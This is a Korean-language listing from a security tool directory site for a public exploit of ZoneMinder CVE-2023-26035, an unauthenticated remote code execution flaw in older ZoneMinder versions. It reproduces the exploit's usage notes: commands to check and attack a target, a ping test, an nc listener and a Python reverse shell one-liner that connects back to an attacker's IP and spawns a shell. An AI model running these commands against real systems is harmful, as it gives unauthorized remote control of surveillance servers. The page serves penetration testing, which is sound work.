Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
zoneminder_CVE-2023-26035 — CVE-2023-26035에 대한 익스플로잇, ZoneMinder < 1.36.33 및 < 1.37.33에 영향 | Kitploit
도구/GitHubGitHub/0xfalafel/zoneminder_cve-2023-26035
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHub0xfalafel/zoneminder_cve-2023-26035

zoneminder_CVE-2023-26035

CVE-2023-26035에 대한 익스플로잇, ZoneMinder < 1.36.33 및 < 1.37.33에 영향

저장소 보기
12년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

익스플로잇 - ZoneMinder CVE-2023-26035

인증되지 않은 원격 코드 실행 (RCE) 취약점이 ZoneMinder Snapshots에 영향을 미칩니다.
이는 CVE-2023-26035를 위한 익스플로잇입니다.

영향을 받는 버전

ZoneMinder < 1.36.33 및
ZoneMinder < 1.37.33.

Usage of the exploit

사용법

대상이 취약한지 확인:

root@kitploit:~
python3 zoneminder.py http://target

명령 실행

root@kitploit:~
python3 zoneminder.py http://target command

예제

ping으로 명령 실행 테스트

대상에 연결된 인터페이스(여기서는 tun0)에서 tcpdump를 실행하고 ICMP 패킷을 필터링:

root@kitploit:~
sudo tcpdump -i tun0 icmp

그런 다음 자신의 IP로 핑을 실행하세요. 명령이 올바르게 해석되도록 따옴표 "를 사용해야 합니다.

root@kitploit:~
python3 zoneminder.py http://target "ping -C 4 your_ip"

리버스 셸

netcat으로 리스너 생성:

root@kitploit:~
nc -lvnp 1337

리버스 셸 원라이너 사용:

root@kitploit:~
python3 zoneminder.py http://TARGET "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"

더 자세한 내용은 https://revshells.com 에서 확인하세요.

요구 사항

이 익스플로잇은 **requests**와 **BeautifulSoup**를 사용합니다.

다음 명령으로 설치:

root@kitploit:~
python3 -m pip install requests beautifulsoup4

감사의 말

저는 Metasploit이 필요 없는 독립 실행형 익스플로잇을 원했습니다.
이 스크립트는 https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/zoneminder_snapshots.rb 에서 파생되었습니다.

https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr

도구 다운로드